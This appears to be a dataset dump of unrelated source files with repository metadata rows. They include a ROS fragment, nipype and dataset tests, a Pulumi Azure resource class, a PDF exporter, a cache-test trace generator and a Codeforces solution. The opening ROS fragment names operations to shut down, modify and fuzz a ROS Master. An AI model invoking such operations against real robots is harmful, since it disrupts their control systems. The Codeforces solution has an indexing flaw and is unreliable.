# origin_port = random.randint(1000, 65000)
# rosparam_get_rosdistro() # send a rosparam get /rosdistro request
rosparam_get_rosdistro() # send a rosparam get /rosdistro request
# getpid() # fetch PID from ROS Master
# rosparam_set_param() # set the param
# shutdown()
# fuzz_XMLRPC()
# ###### Testing of the dissector ##########
#
# # packages = rdpcap("test.pcap")
# packages = rdpcap("test3.pcap")
# packages.show()
#
# p = packages[3]
# # print(p.summary())
#
# # print(p)
# # p.show()
# # print(p.command())
# # hexdump(p)
# ############################
| 34.510436
| 1,229
| 0.585693
|
9250eb1c93643d16e8d87b3e1a0c0a5fb5413ec5
| 71
|
py
|
Python
|
neural_image_styler/__main__.py
|
jake-g/neural_image_styler
|
0b9f88fba4dcfed495ee3a6eac0801e4732df4fc
|
[
"MIT"
] | null | null | null |
neural_image_styler/__main__.py
|
jake-g/neural_image_styler
|
0b9f88fba4dcfed495ee3a6eac0801e4732df4fc
|
[
"MIT"
] | null | null | null |
neural_image_styler/__main__.py
|
jake-g/neural_image_styler
|
0b9f88fba4dcfed495ee3a6eac0801e4732df4fc
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from .neural_image_styler import main
main()
| 11.833333
| 37
| 0.661972
|
883c882aa1c661f304ea039eee9d053da81df220
| 2,150
|
py
|
Python
|
nipype/interfaces/brainsuite/tests/test_auto_Bse.py
|
HussainAther/nipype
|
7e33d086fd5cea6ef6de99ee3e35929c1d5730d4
|
[
"Apache-2.0"
] | null | null | null |
nipype/interfaces/brainsuite/tests/test_auto_Bse.py
|
HussainAther/nipype
|
7e33d086fd5cea6ef6de99ee3e35929c1d5730d4
|
[
"Apache-2.0"
] | null | null | null |
nipype/interfaces/brainsuite/tests/test_auto_Bse.py
|
HussainAther/nipype
|
7e33d086fd5cea6ef6de99ee3e35929c1d5730d4
|
[
"Apache-2.0"
] | null | null | null |
# AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from __future__ import unicode_literals
from ..brainsuite import Bse
def test_Bse_inputs():
input_map = dict(args=dict(argstr='%s',
),
diffusionConstant=dict(argstr='-d %f',
usedefault=True,
),
diffusionIterations=dict(argstr='-n %d',
usedefault=True,
),
dilateFinalMask=dict(argstr='-p',
usedefault=True,
),
edgeDetectionConstant=dict(argstr='-s %f',
usedefault=True,
),
environ=dict(nohash=True,
usedefault=True,
),
ignore_exception=dict(nohash=True,
usedefault=True,
),
inputMRIFile=dict(argstr='-i %s',
mandatory=True,
),
noRotate=dict(argstr='--norotate',
),
outputCortexFile=dict(argstr='--cortex %s',
hash_files=False,
),
outputDetailedBrainMask=dict(argstr='--hires %s',
hash_files=False,
),
outputDiffusionFilter=dict(argstr='--adf %s',
hash_files=False,
),
outputEdgeMap=dict(argstr='--edge %s',
hash_files=False,
),
outputMRIVolume=dict(argstr='-o %s',
genfile=True,
hash_files=False,
),
outputMaskFile=dict(argstr='--mask %s',
genfile=True,
hash_files=False,
),
radius=dict(argstr='-r %f',
usedefault=True,
),
terminal_output=dict(deprecated='1.0.0',
nohash=True,
),
timer=dict(argstr='--timer',
),
trim=dict(argstr='--trim',
usedefault=True,
),
verbosityLevel=dict(argstr='-v %f',
usedefault=True,
),
)
inputs = Bse.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(inputs.traits()[key], metakey) == value
def test_Bse_outputs():
output_map = dict(outputCortexFile=dict(),
outputDetailedBrainMask=dict(),
outputDiffusionFilter=dict(),
outputEdgeMap=dict(),
outputMRIVolume=dict(),
outputMaskFile=dict(),
)
outputs = Bse.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(outputs.traits()[key], metakey) == value
| 24.712644
| 67
| 0.627442
|
79ce2fe5b3776f1e19b640509eb97c2f7b29e710
| 592
|
py
|
Python
|
tests/r/test_wght_loss_incentive7.py
|
hajime9652/observations
|
2c8b1ac31025938cb17762e540f2f592e302d5de
|
[
"Apache-2.0"
] | 199
|
2017-07-24T01:34:27.000Z
|
2022-01-29T00:50:55.000Z
|
tests/r/test_wght_loss_incentive7.py
|
hajime9652/observations
|
2c8b1ac31025938cb17762e540f2f592e302d5de
|
[
"Apache-2.0"
] | 46
|
2017-09-05T19:27:20.000Z
|
2019-01-07T09:47:26.000Z
|
tests/r/test_wght_loss_incentive7.py
|
hajime9652/observations
|
2c8b1ac31025938cb17762e540f2f592e302d5de
|
[
"Apache-2.0"
] | 45
|
2017-07-26T00:10:44.000Z
|
2022-03-16T20:44:59.000Z
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.wght_loss_incentive7 import wght_loss_incentive7
def test_wght_loss_incentive7():
"""Test module wght_loss_incentive7.py by downloading
wght_loss_incentive7.csv and testing shape of
extracted data has 33 rows and 2 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = wght_loss_incentive7(test_path)
try:
assert x_train.shape == (33, 2)
except:
shutil.rmtree(test_path)
raise()
| 24.666667
| 68
| 0.785473
|
ae2d6549c5bb9dcd389e0458d304220dc4248af0
| 10,788
|
py
|
Python
|
sdk/python/pulumi_azure_nextgen/network/v20180401/connection_monitor.py
|
pulumi/pulumi-azure-nextgen
|
452736b0a1cf584c2d4c04666e017af6e9b2c15c
|
[
"Apache-2.0"
] | 31
|
2020-09-21T09:41:01.000Z
|
2021-02-26T13:21:59.000Z
|
sdk/python/pulumi_azure_nextgen/network/v20180401/connection_monitor.py
|
pulumi/pulumi-azure-nextgen
|
452736b0a1cf584c2d4c04666e017af6e9b2c15c
|
[
"Apache-2.0"
] | 231
|
2020-09-21T09:38:45.000Z
|
2021-03-01T11:16:03.000Z
|
sdk/python/pulumi_azure_nextgen/network/v20180401/connection_monitor.py
|
pulumi/pulumi-azure-nextgen
|
452736b0a1cf584c2d4c04666e017af6e9b2c15c
|
[
"Apache-2.0"
] | 4
|
2020-09-29T14:14:59.000Z
|
2021-02-10T20:38:16.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._inputs import *
__all__ = ['ConnectionMonitor']
class ConnectionMonitor(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
auto_start: Optional[pulumi.Input[bool]] = None,
connection_monitor_name: Optional[pulumi.Input[str]] = None,
destination: Optional[pulumi.Input[pulumi.InputType['ConnectionMonitorDestinationArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
monitoring_interval_in_seconds: Optional[pulumi.Input[int]] = None,
network_watcher_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[pulumi.InputType['ConnectionMonitorSourceArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Information about the connection monitor.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] auto_start: Determines if the connection monitor will start automatically once created.
:param pulumi.Input[str] connection_monitor_name: The name of the connection monitor.
:param pulumi.Input[pulumi.InputType['ConnectionMonitorDestinationArgs']] destination: Describes the destination of connection monitor.
:param pulumi.Input[str] location: Connection monitor location.
:param pulumi.Input[int] monitoring_interval_in_seconds: Monitoring interval in seconds.
:param pulumi.Input[str] network_watcher_name: The name of the Network Watcher resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group containing Network Watcher.
:param pulumi.Input[pulumi.InputType['ConnectionMonitorSourceArgs']] source: Describes the source of connection monitor.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Connection monitor tags.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if auto_start is None:
auto_start = True
__props__['auto_start'] = auto_start
__props__['connection_monitor_name'] = connection_monitor_name
if destination is None and not opts.urn:
raise TypeError("Missing required property 'destination'")
__props__['destination'] = destination
__props__['location'] = location
if monitoring_interval_in_seconds is None:
monitoring_interval_in_seconds = 60
__props__['monitoring_interval_in_seconds'] = monitoring_interval_in_seconds
if network_watcher_name is None and not opts.urn:
raise TypeError("Missing required property 'network_watcher_name'")
__props__['network_watcher_name'] = network_watcher_name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
if source is None and not opts.urn:
raise TypeError("Missing required property 'source'")
__props__['source'] = source
__props__['tags'] = tags
__props__['etag'] = None
__props__['monitoring_status'] = None
__props__['name'] = None
__props__['provisioning_state'] = None
__props__['start_time'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/latest:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20171001:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20171101:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20180101:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20180201:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20180601:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20180701:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20180801:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20181001:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20181101:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20181201:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20190201:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20190401:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20190601:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20190701:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20190801:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20190901:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20191101:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20191201:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20200301:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20200401:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20200501:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20200601:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20200701:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20200801:ConnectionMonitor")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(ConnectionMonitor, __self__).__init__(
'azure-nextgen:network/v20180401:ConnectionMonitor',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'ConnectionMonitor':
"""
Get an existing ConnectionMonitor resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return ConnectionMonitor(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="autoStart")
def auto_start(self) -> pulumi.Output[Optional[bool]]:
"""
Determines if the connection monitor will start automatically once created.
"""
return pulumi.get(self, "auto_start")
@property
@pulumi.getter
def destination(self) -> pulumi.Output['outputs.ConnectionMonitorDestinationResponse']:
"""
Describes the destination of connection monitor.
"""
return pulumi.get(self, "destination")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "etag")
@property
@pulumi.getter
def location(self) -> pulumi.Output[Optional[str]]:
"""
Connection monitor location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter(name="monitoringIntervalInSeconds")
def monitoring_interval_in_seconds(self) -> pulumi.Output[Optional[int]]:
"""
Monitoring interval in seconds.
"""
return pulumi.get(self, "monitoring_interval_in_seconds")
@property
@pulumi.getter(name="monitoringStatus")
def monitoring_status(self) -> pulumi.Output[Optional[str]]:
"""
The monitoring status of the connection monitor.
"""
return pulumi.get(self, "monitoring_status")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the connection monitor.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[Optional[str]]:
"""
The provisioning state of the connection monitor.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def source(self) -> pulumi.Output['outputs.ConnectionMonitorSourceResponse']:
"""
Describes the source of connection monitor.
"""
return pulumi.get(self, "source")
@property
@pulumi.getter(name="startTime")
def start_time(self) -> pulumi.Output[Optional[str]]:
"""
The date and time when the connection monitor was started.
"""
return pulumi.get(self, "start_time")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Connection monitor tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Connection monitor type.
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 49.944444
| 1,938
| 0.679366
|
bceebf7097a7b81b4c9137804e3083095be9a9c4
| 5,852
|
py
|
Python
|
Frontend/PrintPDF.py
|
ShowingCloud/Capricorn
|
cfe521975ca23f7502509595f1fd3f8c6c5e1c55
|
[
"MIT"
] | null | null | null |
Frontend/PrintPDF.py
|
ShowingCloud/Capricorn
|
cfe521975ca23f7502509595f1fd3f8c6c5e1c55
|
[
"MIT"
] | null | null | null |
Frontend/PrintPDF.py
|
ShowingCloud/Capricorn
|
cfe521975ca23f7502509595f1fd3f8c6c5e1c55
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
Created on 2013-3-28
@author: Pyroshow
'''
from Models.EngineeringDB import *
from Models.LocalDB import *
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.platypus import *
from reportlab.lib import pagesizes, colors
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import *
from reportlab.pdfbase import *
TABLEFields, TABLEProductList, TABLEFireSequence = xrange (3)
class PrintTable():
def __init__ (self, sess, session, table, parent = None):
self.table = table
if self.table == TABLEFields:
a = [['BoxID','ConnectorID','Size','RisingHeight','Name']]
elif self.table == TABLEProductList:
a = [['ItemNo','Size','Type','Name']]
elif self.table == TABLEFireSequence:
a = [['BoxID','IgnitionTime','FieldID','Name']]
else:
return
#根据表名来设置各字段名
with session.begin():
data = session.query(ScriptData).all()
#取出ScriptData里的所有数据
for row1 in data:
with session.begin():
row2 = session.query(IgnitorsData).filter_by(UUID = row1.IgnitorID).first()
#取出IgnitorsData里的第一行数据
with sess.begin():
row3 = sess.query(FireworksData).filter_by(UUID = row1.FireworkID).first()
#取出FireworksData里的第一行数据
b = []
if self.table == TABLEFields:
b.append(row2.BoxID)
b.append(row3.RisingHeight)
b.append(row3.Name)
b.append(row3.Size)
b.append(row1.ConnectorID)
elif self.table == TABLEProductList:
b.append(row3.Type)
b.append(row3.ItemNo)
b.append(row3.Name)
b.append(row3.Size)
elif self.table == TABLEFireSequence:
b.append(row2.BoxID)
b.append(row1.IgnitionTime)
b.append(row3.Name)
b.append(row2.FieldID)
#根据表名将相应字段内的数据写进数组里
a.append(b)
#将数组b的内容放进二维数组a里
self.creatTable(a)
#调用函数creatTable
def Pages(self,canvas,doc):
canvas.saveState()
canvas.drawString((doc.pagesize[0]/2)-5,25,u'%d'%(doc.page))
canvas.restoreState()
#生成页脚页码的函数
def creatTable(self, data):
elements = []
styles = getSampleStyleSheet()
if self.table == TABLEFields:
doc = SimpleDocTemplate(os.path.join (appdata, 'pdf', 'Fields.pdf'), pagesize = pagesizes.A4)
#设置文件名,获取页面宽度
pwidth = (doc.pagesize[0] - 20) / 1000
#将页面宽度分为1000等份
elements.append(Paragraph('Field', styles['Title']))
#设置表格标题
colwidths = (pwidth*120,pwidth*120,pwidth*120,pwidth*120,pwidth*120)
#设置表格列数及没列宽度
table1 = Table(data, colwidths)
table1.setStyle(TableStyle([('ALIGN',(0,0),(-1,-1),'CENTER'),
('GRID',(0,0),(-1,-1),0.5,colors.black)]))
#设置表格格式
elements.append(table1)
elif self.table == TABLEProductList:
doc = SimpleDocTemplate(os.path.join (appdata, 'pdf', 'ProductList.pdf'), pagesize = pagesizes.A4)
pwidth = (doc.pagesize[0] - 20) / 1000
elements.append(Paragraph('ProductList', styles['Title']))
colwidths = (pwidth*120,pwidth*120,pwidth*120,pwidth*120)
table2 = Table(data, colwidths)
table2.setStyle(TableStyle([('ALIGN',(0,0),(-1,-1),'CENTER'),
('GRID',(0,0),(-1,-1),0.5,colors.black)]))
elements.append(table2)
elif self.table == TABLEFireSequence:
doc = SimpleDocTemplate(os.path.join (appdata, 'pdf', 'FireSequence.pdf'), pagesize = pagesizes.A4)
pwidth = (doc.pagesize[0] - 20) / 1000
elements.append(Paragraph('FireSequence', styles['Title']))
colwidths = (pwidth*130,pwidth*130,pwidth*130,pwidth*130)
table3 = Table(data, colwidths)
table3.setStyle(TableStyle([('ALIGN',(0,0),(-1,-1),'CENTER'),
('GRID',(0,0),(-1,-1),0.5,colors.black)]))
elements.append(table3)
else:
return
doc.build(elements,onFirstPage=self.Pages,onLaterPages=self.Pages)
#生成报表
if __name__=='__main__':
ptable = PrintTable()
#实例化类
sess = session()
sess1 = session1()
base.metadata.create_all (engine)
base1.metadata.create_all (engine1)
# a1 = [['BoxID','ConnectorID','Size','RisingHeight','Name']]
# a2 = [['ItemNo','Size','Type','Name']]
# a3 = [['BoxID','IgnitionTime','FieldID','Name']]
#
# with sess1.begin():
# data1 = sess1.query(ScriptData).all()
#
# for row1 in data1:
# with sess1.begin():
# row2 = sess1.query(IgnitorsData).filter_by(UUID = row1.IgnitorID).first()
# with sess.begin():
# row3 = sess.query(FireworksData).filter_by(UUID = row1.FireworkID).first()
#
# b1 = []
# b1.append(row2.BoxID)
# b1.append(row3.RisingHeight)
# b1.append(row3.Name)
# b1.append(row3.Size)
# b1.append(row1.ConnectorID)
# a1.append(b1)
#
# b2 = []
# b2.append(row3.Type)
# b2.append(row3.ItemNo)
# b2.append(row3.Name)
# b2.append(row3.Size)
# a2.append(b2)
#
# b3 = []
# b3.append(row2.BoxID)
# b3.append(row1.IgnitionTime)
# b3.append(row3.Name)
# b3.append(row2.FieldID)
# a3.append(b3)
#
# ptable.creatTable(a1, a2, a3)
| 36.575
| 112
| 0.542208
|
0ccadc251e8bb647061654d8b547522498f5b268
| 8,011
|
py
|
Python
|
bp_me/test/tb/bp_cce/test_gen.py
|
wantan244/black-parrot
|
dd2d8453a49b0f069e96f175afe97968dac205e1
|
[
"BSD-3-Clause"
] | 236
|
2020-02-24T20:42:36.000Z
|
2022-03-29T13:25:09.000Z
|
bp_me/test/tb/bp_cce/test_gen.py
|
wantan244/black-parrot
|
dd2d8453a49b0f069e96f175afe97968dac205e1
|
[
"BSD-3-Clause"
] | 502
|
2020-02-21T13:23:30.000Z
|
2022-03-31T15:57:21.000Z
|
bp_me/test/tb/bp_cce/test_gen.py
|
wantan244/black-parrot
|
dd2d8453a49b0f069e96f175afe97968dac205e1
|
[
"BSD-3-Clause"
] | 109
|
2020-02-24T20:42:50.000Z
|
2022-03-29T05:52:32.000Z
|
from __future__ import print_function
import sys
import random
import math
import os
from trace_gen import TraceGen
from test_memory import TestMemory
# Test Generator class
# a test is defined as a sequence of load and store operation tuples
# Each operation tuple is: (store, address, size in bytes, uncached, value)
# If store=True, op is a store, else op is a load
# size is in bytes, and must be 1, 2, 4, or 8
# If uncached=1, op is an uncached access, else it is a cached access
# value is the store value or expected load value
class TestGenerator(object):
def __init__(self, paddr_width=40, data_width=64, num_lce=1, out_dir='.', trace_file='test', debug=False):
self.paddr_width = paddr_width
self.data_width = data_width
self.tg = TraceGen(addr_width_p=self.paddr_width, data_width_p=self.data_width)
self.num_lce = num_lce
self.out_dir = out_dir
self.trace_file = trace_file
self.debug = debug
def eprint(self, *args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
def generateTrace(self, ops):
for lce in ops:
file_name = '{0}_{1}.tr'.format(self.trace_file, lce)
with open(os.path.join(self.out_dir, file_name), 'w') as lce_trace_file:
# preamble
lce_trace_file.write(self.tg.print_header())
lce_trace_file.write(self.tg.wait(100))
for (st,addr,size,uc,val) in ops[lce]:
if st:
lce_trace_file.write(self.tg.send_store(size=size, addr=addr, data=val, uc=uc))
lce_trace_file.write(self.tg.recv_data(addr=addr, data=0, uc=uc))
else:
# TODO: signed operations
lce_trace_file.write(self.tg.send_load(signed=0, size=size, addr=addr, uc=uc))
lce_trace_file.write(self.tg.recv_data(addr=addr, data=val, uc=uc))
# test end
lce_trace_file.write(self.tg.test_done())
# single cached store
def storeTest(self, mem_base=0):
addr = mem_base
return [(True, addr, 8, 0, 1)]
# cached store/load pair
def loadTest(self, mem_base=0):
addr = mem_base
return [(True, addr, 8, 0, 1), (False, addr, 8, 0, 1)]
# fill a cache set with stores
# evict an entry
# load back the entry
def setTest(self, mem_base=0, assoc=8, sets=64, block_size=64):
ops = []
addr = mem_base
# blocks in same set are separated by (sets*block_size) in byte-addressable memory
stride = sets*block_size
store_val = 1
for i in range(assoc+1):
ops.append((True, addr, 8, 0, store_val))
addr += stride
store_val += 1
ops.append((False, mem_base, 8, 0, 1))
return ops
# Random loads and stores to a single set (set 0)
def setHammerTest(self, N=16, mem_base=0, mem_bytes=1024, mem_block_size=64, mem_size=2, assoc=8, sets=64, seed=0, lce_mode=0):
# test begin
random.seed(seed)
ops = []
mem = TestMemory(mem_base, mem_bytes, mem_block_size, self.debug)
# compute block addresses for all blocks mapping to set 0
blocks = [i*sets*mem_block_size for i in range(assoc*mem_size)]
store_val = 1
for i in range(N):
# pick access parameters
store = random.choice([True, False])
size = random.choice([1, 2, 4, 8])
size_shift = int(math.log(size, 2))
# determine type of request (cached or uncached)
uncached_req = 0
if lce_mode == 2:
uncached_req = random.choice([0,1])
elif lce_mode == 1:
uncached_req = 1
# choose which cache block in memory to target
block = random.choice(blocks)
# choose offset in cache block based on size of access ("word" size for this access)
words = mem_block_size / size
word = random.randint(0, words-1)
# build the address
addr = block + (word << size_shift) + mem_base
mem.check_valid_addr(addr)
val = 0
if store:
# NOTE: the value being stored will be truncated to size number of bytes
store_val_trunc = store_val
if (size < 8):
store_val_trunc = store_val_trunc & ~(~0 << (size*8))
mem.write_memory(addr, store_val_trunc, size)
val = store_val_trunc
store_val += 1
else:
val = mem.read_memory(addr, size)
ops.append((store, addr, size, uncached_req, val))
return ops
# Random loads and stores to a single cache block
def blockTest(self, N=16, mem_base=0, block_size=64, seed=0):
return self.randomTest(N, mem_base, block_size, block_size, seed, 0)
# Random Test generator
# N is number of operations
# lce_mode = 0, 1, or 2 -> 0 = cached only, 1 = uncached only, 2 = mixed
def randomTest(self, N=16, mem_base=0, mem_bytes=1024, mem_block_size=64, seed=0, lce_mode=0):
# test begin
random.seed(seed)
ops = []
mem = TestMemory(mem_base, mem_bytes, mem_block_size, self.debug)
mem_blocks = mem_bytes / mem_block_size
b = int(math.log(mem_block_size, 2))
store_val = 1
for i in range(N):
# pick access parameters
store = random.choice([True, False])
size = random.choice([1, 2, 4, 8])
size_shift = int(math.log(size, 2))
# determine type of request (cached or uncached)
uncached_req = 0
if lce_mode == 2:
uncached_req = random.choice([0,1])
elif lce_mode == 1:
uncached_req = 1
# choose which cache block in memory to target
block = random.randint(0, mem_blocks-1)
# choose offset in cache block based on size of access ("word" size for this access)
words = mem_block_size / size
word = random.randint(0, words-1)
# build the address
addr = (block << b) + (word << size_shift) + mem_base
mem.check_valid_addr(addr)
val = 0
if store:
# NOTE: the value being stored will be truncated to size number of bytes
store_val_trunc = store_val
if (size < 8):
store_val_trunc = store_val_trunc & ~(~0 << (size*8))
mem.write_memory(addr, store_val_trunc, size)
val = store_val_trunc
store_val += 1
else:
val = mem.read_memory(addr, size)
ops.append((store, addr, size, uncached_req, val))
# return the test operations
return ops
# AXE Test generator
# N is number of operations per LCE
# lce_mode = 0, 1, or 2 -> 0 = cached only, 1 = uncached only, 2 = mixed
def axeTest(self, lce=1, N=16, mem_base=0, mem_bytes=1024, mem_block_size=64, seed=0, lce_mode=0):
# test begin
random.seed(seed)
ops = {i:[] for i in range(lce)}
mem = TestMemory(mem_base, mem_bytes, mem_block_size, self.debug)
mem_blocks = mem_bytes / mem_block_size
b = int(math.log(mem_block_size, 2))
store_val = 1
for i in range(N):
for l in range(lce):
# pick access parameters
store = random.choice([True, False])
# all accesses are size 8B for AXE tracing
size = 8
size_shift = int(math.log(size, 2))
# determine type of request (cached or uncached)
uncached_req = 0
if lce_mode == 2:
uncached_req = random.choice([0,1])
elif lce_mode == 1:
uncached_req = 1
# choose which cache block in memory to target
block = random.randint(0, mem_blocks-1)
# choose offset in cache block based on size of access ("word" size for this access)
words = mem_block_size / size
word = random.randint(0, words-1)
# build the address
addr = (block << b) + (word << size_shift) + mem_base
mem.check_valid_addr(addr)
val = 0
if store:
# NOTE: the value being stored will be truncated to size number of bytes
store_val_trunc = store_val
if (size < 8):
store_val_trunc = store_val_trunc & ~(~0 << (size*8))
val = store_val_trunc
store_val += 1
else:
# loads return 0 for AXE tracing
val = 0
ops[l].append((store, addr, size, uncached_req, val))
# return the test operations
return ops
| 35.763393
| 129
| 0.634627
|
e1ff26ec50243465ac3367fa497ab8132dfc294f
| 3,716
|
py
|
Python
|
Coding/Competitive_Coding/CodeForces/0 - 1300/Effective_Approach.py
|
Phantom586/My_Codes
|
900c4e5e95ab833e4f78f1594e3b25178a74f1a7
|
[
"MIT"
] | null | null | null |
Coding/Competitive_Coding/CodeForces/0 - 1300/Effective_Approach.py
|
Phantom586/My_Codes
|
900c4e5e95ab833e4f78f1594e3b25178a74f1a7
|
[
"MIT"
] | null | null | null |
Coding/Competitive_Coding/CodeForces/0 - 1300/Effective_Approach.py
|
Phantom586/My_Codes
|
900c4e5e95ab833e4f78f1594e3b25178a74f1a7
|
[
"MIT"
] | null | null | null |
# Once at a team training Vasya, Petya and Sasha got a problem on implementing linear search in an array.
# According to the boys, linear search works as follows. The array elements in a pre-selected order are in turn compared
# with the number that you need to find. Once you find the array element that is equal to the required one, the search
# ends. The efficiency of the algorithm is the number of performed comparisons. The fewer comparisons the linear search
# has made, the more effective it is.
# Vasya believes that a linear search would work better if it sequentially iterates through the elements, starting with
# the 1-st one (in this problem we consider the elements of the array indexed from 1 to n) and ending with the n-th one.
# And Petya says that Vasya is wrong: the search will need less comparisons if it sequentially iterates the elements
# starting from the n-th and ending with the 1-st one. Sasha argues that the two approaches are equivalent.
# To finally begin the task, the teammates decided to settle the debate and compare the two approaches on an example.
# For this, they took an array that is a permutation of integers from 1 to n, and generated m queries of the form:
# find element with value bi in the array. They want to calculate for both approaches how many comparisons in total
# the linear search will need to respond to all queries. If the first search needs fewer comparisons, then the winner
# of the dispute is Vasya. If the second one does, then the winner is Petya. If both approaches make the same number
# of comparisons, then Sasha's got the upper hand.
# But the problem is, linear search is too slow. That's why the boys aren't going to find out who is right before the
# end of the training, unless you come in here. Help them to determine who will win the dispute.
# Input
# The first line contains integer n (1 ≤ n ≤ 105) — the number of elements in the array. The second line contains n
# distinct space-separated integers a1, a2, ..., an (1 ≤ ai ≤ n) — the elements of array.
# The third line contains integer m (1 ≤ m ≤ 105) — the number of queries. The last line contains m space-separated
# integers b1, b2, ..., bm (1 ≤ bi ≤ n) — the search queries. Note that the queries can repeat.
# Output
# Print two integers, showing how many comparisons Vasya's approach needs and how many comparisons Petya's approach
# needs. Separate the numbers by spaces.
# Please, do not use the %lld specifier to read or write 64-bit integers in С++. It is preferred to use cin, cout
# streams or the %I64d specifier.
# Examples
# inputCopy
# 2
# 1 2
# 1
# 1
# outputCopy
# 1 2
# inputCopy
# 2
# 2 1
# 1
# 1
# outputCopy
# 2 1
# inputCopy
# 3
# 3 1 2
# 3
# 1 2 3
# outputCopy
# 6 6
# Note
# In the first sample Vasya's approach will make one comparison (it starts with the 1-st element and immediately finds
# the required number), and Petya's approach makes two comparisons (first he compares with the 2-nd array element,
# doesn't find the search item and compares with the 1-st element).
# In the second sample, on the contrary, Vasya's approach will need two comparisons (first with 1-st element, and then
# with the 2-nd), and Petya's approach will find the required value in one comparison (the first comparison with
# the 2-nd element)
n = int(input())
lst = list(map(int, input().split()))
queries = int(input())
q_lst = list(map(int, input().split()))
checked = [0 for i in range(n+1)]
for i in range(queries):
a = lst.index(q_lst[i]) + 1
checked[i+1] = a
p_approach = 0
v_approach = 0
for i in range(1, len(q_lst)+1):
a = checked[i]
p_approach += a
v_approach += n - a + 1
print(p_approach, v_approach)
| 44.771084
| 120
| 0.730893
|
c5fa2eb94412e0dbece6b57a86d3d9f8867c5997
| 2,305
|
py
|
Python
|
